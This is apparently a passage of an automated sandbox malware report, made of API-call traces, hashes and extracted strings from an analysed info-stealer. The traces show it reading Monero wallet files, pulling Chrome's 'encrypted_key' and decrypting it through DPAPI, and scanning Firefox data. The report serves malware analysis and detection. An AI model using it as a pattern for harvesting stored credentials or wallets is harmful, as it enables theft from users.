                                          • RtlAllocateHeap.NTDLL(00000000), ref: 00EA8836
                                          • wsprintfA.USER32 ref: 00EA8850
                                            • Part of subcall function 00EAA740: lstrcpy.KERNEL32(00EB0E17,00000000), ref: 00EAA788
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                           • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocateProcesslstrcpywsprintf
                                          • String ID: %dx%d
                                          • API String ID: 1695172769-2206825331
                                          • Opcode ID: ecb69728db947366442acdf1a2a120defce4be8e7b2d79855440b5c2cf1d4dc9
                                          • Instruction ID: e45c20e06643075303e93f44cfd089d96df57d9b65b0dfc8979c2aadd17b7557
                                          • Opcode Fuzzy Hash: ecb69728db947366442acdf1a2a120defce4be8e7b2d79855440b5c2cf1d4dc9
                                          • Instruction Fuzzy Hash: A4212EB1B41204EFDB14DF94DD45FAEBBB8FB48711F104119FA05A7284C77AA9008BA0
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00EA951E,00000000), ref: 00EA8D5B
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 00EA8D62
                                          • wsprintfW.USER32 ref: 00EA8D78
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                           • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocateProcesswsprintf
                                          • String ID: %hs
                                          • API String ID: 769748085-2783943728
                                          • Opcode ID: 69367c7e0736406dea179855e02288d85ecdde53dce4210159f84d4a7a44b35d
                                          • Instruction ID: 3538b1e1684e2571b658d9273760eaed03c54ec9ba7b38ff0087a0656c6efea8
                                          • Opcode Fuzzy Hash: 69367c7e0736406dea179855e02288d85ecdde53dce4210159f84d4a7a44b35d
                                          • Instruction Fuzzy Hash: FFE08CB0B41208FBC720DF94DC0AE6A77B8EB44702F000094FD4A97280DA76AE008BA1
                                          APIs
                                            • Part of subcall function 00EAA740: lstrcpy.KERNEL32(00EB0E17,00000000), ref: 00EAA788
                                            • Part of subcall function 00EAA9B0: lstrlen.KERNEL32(?,00BB8938,?,\Monero\wallet.keys,00EB0E17), ref: 00EAA9C5
                                            • Part of subcall function 00EAA9B0: lstrcpy.KERNEL32(00000000), ref: 00EAAA04
                                            • Part of subcall function 00EAA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EAAA12
                                            • Part of subcall function 00EAA8A0: lstrcpy.KERNEL32(?,00EB0E17), ref: 00EAA905
                                            • Part of subcall function 00EA8B60: GetSystemTime.KERNEL32(00EB0E1A,00BBEF20,00EB05AE,?,?,00E913F9,?,0000001A,00EB0E1A,00000000,?,00BB8938,?,\Monero\wallet.keys,00EB0E17), ref: 00EA8B86
                                            • Part of subcall function 00EAA920: lstrcpy.KERNEL32(00000000,?), ref: 00EAA972
                                            • Part of subcall function 00EAA920: lstrcat.KERNEL32(00000000), ref: 00EAA982
                                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00E9A2E1
                                          • lstrlen.KERNEL32(00000000,00000000), ref: 00E9A3FF
                                          • lstrlen.KERNEL32(00000000), ref: 00E9A6BC
                                            • Part of subcall function 00EAA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EAA7E6
                                          • DeleteFileA.KERNEL32(00000000), ref: 00E9A743
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                           • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                          • String ID:
                                          • API String ID: 211194620-0
                                          • Opcode ID: cbd55048c0a8b4cbfe2faa5ad76bcf04a9932f9981eafe4b774513966e95b7f6
                                          • Instruction ID: 5f20a23e0f1d161b375cccc4d5486456969f394b6531ed2eba3c1f2c9fd6f062
                                          • Opcode Fuzzy Hash: cbd55048c0a8b4cbfe2faa5ad76bcf04a9932f9981eafe4b774513966e95b7f6
                                          • Instruction Fuzzy Hash: A9E152729102089BCB58FBA4DC96EEE7378AF59300F559179F4137A091EF347A09CB62
                                          APIs
                                            • Part of subcall function 00EAA740: lstrcpy.KERNEL32(00EB0E17,00000000), ref: 00EAA788
                                            • Part of subcall function 00EAA9B0: lstrlen.KERNEL32(?,00BB8938,?,\Monero\wallet.keys,00EB0E17), ref: 00EAA9C5
                                            • Part of subcall function 00EAA9B0: lstrcpy.KERNEL32(00000000), ref: 00EAAA04
                                            • Part of subcall function 00EAA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EAAA12
                                            • Part of subcall function 00EAA8A0: lstrcpy.KERNEL32(?,00EB0E17), ref: 00EAA905
                                            • Part of subcall function 00EA8B60: GetSystemTime.KERNEL32(00EB0E1A,00BBEF20,00EB05AE,?,?,00E913F9,?,0000001A,00EB0E1A,00000000,?,00BB8938,?,\Monero\wallet.keys,00EB0E17), ref: 00EA8B86
                                            • Part of subcall function 00EAA920: lstrcpy.KERNEL32(00000000,?), ref: 00EAA972
                                            • Part of subcall function 00EAA920: lstrcat.KERNEL32(00000000), ref: 00EAA982
                                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00E9D481
                                          • lstrlen.KERNEL32(00000000), ref: 00E9D698
                                          • lstrlen.KERNEL32(00000000), ref: 00E9D6AC
                                          • DeleteFileA.KERNEL32(00000000), ref: 00E9D72B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                           • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                          • String ID:
                                          • API String ID: 211194620-0
                                          • Opcode ID: e2e616bf07861d9f8e317420cb3db014fbb05f48dd9cd1fc5d9e9ca4a3c874e6
                                          • Instruction ID: b0bcac7055135ddf940f28f48976b0a1903aff3f8357059fe7ee46ee0239d15e
                                          • Opcode Fuzzy Hash: e2e616bf07861d9f8e317420cb3db014fbb05f48dd9cd1fc5d9e9ca4a3c874e6
                                          • Instruction Fuzzy Hash: B99124729102049BCB58FBA0DC96EEE73B8AF59300F555179F5077A091EF387A09CB62
                                          APIs
                                            • Part of subcall function 00EAA740: lstrcpy.KERNEL32(00EB0E17,00000000), ref: 00EAA788
                                            • Part of subcall function 00EAA9B0: lstrlen.KERNEL32(?,00BB8938,?,\Monero\wallet.keys,00EB0E17), ref: 00EAA9C5
                                            • Part of subcall function 00EAA9B0: lstrcpy.KERNEL32(00000000), ref: 00EAAA04
                                            • Part of subcall function 00EAA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EAAA12
                                            • Part of subcall function 00EAA8A0: lstrcpy.KERNEL32(?,00EB0E17), ref: 00EAA905
                                            • Part of subcall function 00EA8B60: GetSystemTime.KERNEL32(00EB0E1A,00BBEF20,00EB05AE,?,?,00E913F9,?,0000001A,00EB0E1A,00000000,?,00BB8938,?,\Monero\wallet.keys,00EB0E17), ref: 00EA8B86
                                            • Part of subcall function 00EAA920: lstrcpy.KERNEL32(00000000,?), ref: 00EAA972
                                            • Part of subcall function 00EAA920: lstrcat.KERNEL32(00000000), ref: 00EAA982
                                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00E9D801
                                          • lstrlen.KERNEL32(00000000), ref: 00E9D99F
                                          • lstrlen.KERNEL32(00000000), ref: 00E9D9B3
                                          • DeleteFileA.KERNEL32(00000000), ref: 00E9DA32
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                           • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                          • String ID:
                                          • API String ID: 211194620-0
                                          • Opcode ID: dd8e5050beaf2609442c27ef8b6a550e7e696857118961bd31a0d2552c2a686c
                                          • Instruction ID: 686bd3a3671092e26ca8195145f35afca58412296f4cfaffe18e2a296db81ecb
                                          • Opcode Fuzzy Hash: dd8e5050beaf2609442c27ef8b6a550e7e696857118961bd31a0d2552c2a686c
                                          • Instruction Fuzzy Hash: AF8113729102049BCB48FBA4DC56EEE73B8AF59300F455139F407BA091EF387A09CB62
                                          APIs
                                            • Part of subcall function 00EAA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EAA7E6
                                            • Part of subcall function 00E999C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E999EC
                                            • Part of subcall function 00E999C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00E99A11
                                            • Part of subcall function 00E999C0: LocalAlloc.KERNEL32(00000040,?), ref: 00E99A31
                                            • Part of subcall function 00E999C0: ReadFile.KERNEL32(000000FF,?,00000000,00E9148F,00000000), ref: 00E99A5A
                                            • Part of subcall function 00E999C0: LocalFree.KERNEL32(00E9148F), ref: 00E99A90
                                            • Part of subcall function 00E999C0: CloseHandle.KERNEL32(000000FF), ref: 00E99A9A
                                            • Part of subcall function 00EA8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00EA8E52
                                            • Part of subcall function 00EAA740: lstrcpy.KERNEL32(00EB0E17,00000000), ref: 00EAA788
                                            • Part of subcall function 00EAA9B0: lstrlen.KERNEL32(?,00BB8938,?,\Monero\wallet.keys,00EB0E17), ref: 00EAA9C5
                                            • Part of subcall function 00EAA9B0: lstrcpy.KERNEL32(00000000), ref: 00EAAA04
                                            • Part of subcall function 00EAA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EAAA12
                                            • Part of subcall function 00EAA8A0: lstrcpy.KERNEL32(?,00EB0E17), ref: 00EAA905
                                            • Part of subcall function 00EAA920: lstrcpy.KERNEL32(00000000,?), ref: 00EAA972
                                            • Part of subcall function 00EAA920: lstrcat.KERNEL32(00000000), ref: 00EAA982
                                          • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00EB1580,00EB0D92), ref: 00E9F54C
                                          • lstrlen.KERNEL32(00000000), ref: 00E9F56B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                           • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                          • String ID: ^userContextId=4294967295$moz-extension+++
                                          • API String ID: 998311485-3310892237
                                          • Opcode ID: 9a656b6e487cdfb08c2b7c1b085f14f9aecc3c9597e4a6951c23c6bc82de7fdf
                                          • Instruction ID: 634ee7da492e00618b2a246be5f60b875638806706a1b2b23c3136c8b25f4886
                                          • Opcode Fuzzy Hash: 9a656b6e487cdfb08c2b7c1b085f14f9aecc3c9597e4a6951c23c6bc82de7fdf
                                          • Instruction Fuzzy Hash: 5B511272D102089ADB48FBA0DC56DEE73B8AF59300F459539F4167B191EF347A09CBA2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                           • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy
                                          • String ID: s$s$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                          • API String ID: 3722407311-3520659465
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$lstrlen
                                          • String ID:
                                          • API String ID: 367037083-0
                                          APIs
                                            • Part of subcall function 00EAA740: lstrcpy.KERNEL32(00EB0E17,00000000), ref: 00EAA788
                                            • Part of subcall function 00E999C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E999EC
                                            • Part of subcall function 00E999C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00E99A11
                                            • Part of subcall function 00E999C0: LocalAlloc.KERNEL32(00000040,?), ref: 00E99A31
                                            • Part of subcall function 00E999C0: ReadFile.KERNEL32(000000FF,?,00000000,00E9148F,00000000), ref: 00E99A5A
                                            • Part of subcall function 00E999C0: LocalFree.KERNEL32(00E9148F), ref: 00E99A90
                                            • Part of subcall function 00E999C0: CloseHandle.KERNEL32(000000FF), ref: 00E99A9A
                                            • Part of subcall function 00EA8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00EA8E52
                                          • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00E99D39
                                            • Part of subcall function 00E99AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00E99AEF
                                            • Part of subcall function 00E99AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00E94EEE,00000000,?), ref: 00E99B01
                                            • Part of subcall function 00E99AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00E99B2A
                                            • Part of subcall function 00E99AC0: LocalFree.KERNEL32(?,?,?,?,00E94EEE,00000000,?), ref: 00E99B3F
                                            • Part of subcall function 00E99B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00E99B84
                                            • Part of subcall function 00E99B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00E99BA3
                                            • Part of subcall function 00E99B60: LocalFree.KERNEL32(?), ref: 00E99BD3
                                          Strings
                                          Yara matches
                                          Similarity
                                          • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                          • String ID: $"encrypted_key":"$DPAPI
                                          • API String ID: 2100535398-738592651
                                          APIs
                                          • __getptd.LIBCMT ref: 00EAC74E
                                            • Part of subcall function 00EABF9F: __amsg_exit.LIBCMT ref: 00EABFAF
                                          • __getptd.LIBCMT ref: 00EAC765
                                          • __amsg_exit.LIBCMT ref: 00EAC773
                                          • __updatetlocinfoEx_nolock.LIBCMT ref: 00EAC797
                                          Yara matches
                                          Similarity
                                          • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                          • String ID:
                                          • API String ID: 300741435-0
                                          APIs
                                            • Part of subcall function 00EA8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00EA8E0B
                                          • lstrcat.KERNEL32(?,00000000), ref: 00EA4F7A
                                          • lstrcat.KERNEL32(?,00EB1070), ref: 00EA4F97
                                          • lstrcat.KERNEL32(?,00BB89B8), ref: 00EA4FAB
                                          • lstrcat.KERNEL32(?,00EB1074), ref: 00EA4FBD
                                            • Part of subcall function 00EA4910: wsprintfA.USER32 ref: 00EA492C
                                            • Part of subcall function 00EA4910: FindFirstFileA.KERNEL32(?,?), ref: 00EA4943
                                            • Part of subcall function 00EA4910: StrCmpCA.SHLWAPI(?,00EB0FDC), ref: 00EA4971
                                            • Part of subcall function 00EA4910: StrCmpCA.SHLWAPI(?,00EB0FE0), ref: 00EA4987
                                            • Part of subcall function 00EA4910: FindNextFileA.KERNEL32(000000FF,?), ref: 00EA4B7D
                                            • Part of subcall function 00EA4910: FindClose.KERNEL32(000000FF), ref: 00EA4B92
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                          • String ID:
                                          • API String ID: 2667927680-0